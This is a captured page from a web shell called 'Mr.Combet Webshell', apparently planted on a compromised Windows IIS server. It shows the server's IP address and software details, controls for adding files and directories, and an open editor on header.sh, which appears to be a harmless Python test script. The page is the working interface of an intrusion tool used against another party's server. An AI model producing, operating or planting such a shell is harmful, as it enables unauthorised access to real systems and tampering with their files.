Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
Program Files
/
Python312
/
Lib
/
test
/
ziptestdata
/
Edit File Name :
header.sh
#!/bin/bash INTERPRETER_UNDER_TEST="$1" if [[ ! -x "${INTERPRETER_UNDER_TEST}" ]]; then echo "Interpreter must be the command line argument." exit 4 fi EXECUTABLE="$0" exec "${INTERPRETER_UNDER_TEST}" -E - <<END_OF_PYTHON import os import zipfile namespace = {} filename = os.environ['EXECUTABLE'] print(f'Opening {filename} as a zipfile.') with zipfile.ZipFile(filename, mode='r') as exe_zip: for file_info in exe_zip.infolist(): data = exe_zip.read(file_info) exec(data, namespace, namespace) break # Only use the first file in the archive. print('Favorite number in executable:', namespace["FAVORITE_NUMBER"]) ### Archive contents will be appended after this file. ### END_OF_PYTHON
Save